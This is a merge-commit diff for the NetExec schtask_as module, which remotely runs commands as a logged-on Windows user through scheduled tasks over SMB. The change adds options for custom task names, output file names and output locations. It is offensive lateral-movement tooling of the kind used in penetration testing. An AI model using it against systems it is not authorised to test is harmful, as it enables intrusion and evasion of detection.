Merge pull request #342 from Kahvi-0/main

schtask_as Improvement - Options for custom task, file, and location.
Pennyw0rth · Sep 1, 2024 · 7657f96 · 7657f96
2 parents 9cc44f6 + 0175be7
commit 7657f96
Showing 1 changed file with 27 additions and 7 deletions.
diff --git a/nxc/modules/schtask_as.py b/nxc/modules/schtask_as.py
@@ -15,17 +15,29 @@ class NXCModule:
     """
 
     def options(self, context, module_options):
-        """
+        r"""
         CMD            Command to execute
         USER           User to execute command as
+        TASK           OPTIONAL: Set a name for the scheduled task name
+        FILE           OPTIONAL: Set a name for the command output file
+        LOCATION       OPTIONAL: Set a location for the command output file (e.g. '\tmp\')
         """
-        self.cmd = self.user = self.time = None
+        self.cmd = self.user = self.task = self.file = self.location = self.time = None
         if "CMD" in module_options:
             self.cmd = module_options["CMD"]
 
         if "USER" in module_options:
             self.user = module_options["USER"]
 
+        if "TASK" in module_options:
+            self.task = module_options["TASK"]
+
+        if "FILE" in module_options:
+            self.file = module_options["FILE"]
+
+        if "LOCATION" in module_options:
+            self.location = module_options["LOCATION"]
+
     name = "schtask_as"
     description = "Remotely execute a scheduled task as a logged on user"
     supported_protocols = ["smb"]
@@ -51,6 +63,9 @@ def on_admin_login(self, context, connection):
                 connection.domain,
                 self.user,
                 self.cmd,
+                self.file,
+                self.task,
+                self.location,
                 connection.kerberos,
                 connection.aesKey,
                 connection.host,
@@ -79,7 +94,7 @@ def on_admin_login(self, context, connection):
 
 
 class TSCH_EXEC:
-    def __init__(self, target, share_name, username, password, domain, user, cmd, doKerberos=False, aesKey=None, remoteHost=None, kdcHost=None, hashes=None, logger=None, tries=None, share=None):
+    def __init__(self, target, share_name, username, password, domain, user, cmd, file, task, location, doKerberos=False, aesKey=None, remoteHost=None, kdcHost=None, hashes=None, logger=None, tries=None, share=None):
         self.__target = target
         self.__username = username
         self.__password = password
@@ -99,6 +114,9 @@ def __init__(self, target, share_name, username, password, domain, user, cmd, do
         self.logger = logger
         self.cmd = cmd
         self.user = user
+        self.file = file
+        self.task = task
+        self.location = location
 
         if hashes is not None:
             if hashes.find(":") != -1:
@@ -181,7 +199,11 @@ def gen_xml(self, command, fileless=False):
       <Command>cmd.exe</Command>
 """
         if self.__retOutput:
-            self.__output_filename = f"\\Windows\\Temp\\{gen_random_string(6)}"
+            fileLocation = "\\Windows\\Temp\\" if self.location is None else self.location
+            if self.file is None:
+                self.__output_filename = os.path.join(fileLocation, gen_random_string(6))
+            else:
+                self.__output_filename = os.path.join(fileLocation, self.file)
             if fileless:
                 local_ip = self.__rpctransport.get_socket().getsockname()[0]
                 argument_xml = f"      <Arguments>/C {command} &gt; \\\\{local_ip}\\{self.__share_name}\\{self.__output_filename} 2&gt;&amp;1</Arguments>"
@@ -207,9 +229,7 @@ def execute_handler(self, command, fileless=False):
 
         dce.set_credentials(*self.__rpctransport.get_credentials())
         dce.connect()
-
-        tmpName = gen_random_string(8)
-
+        tmpName = gen_random_string(8) if self.task is None else self.task
         xml = self.gen_xml(command, fileless)
 
         self.logger.info(f"Task XML: {xml}")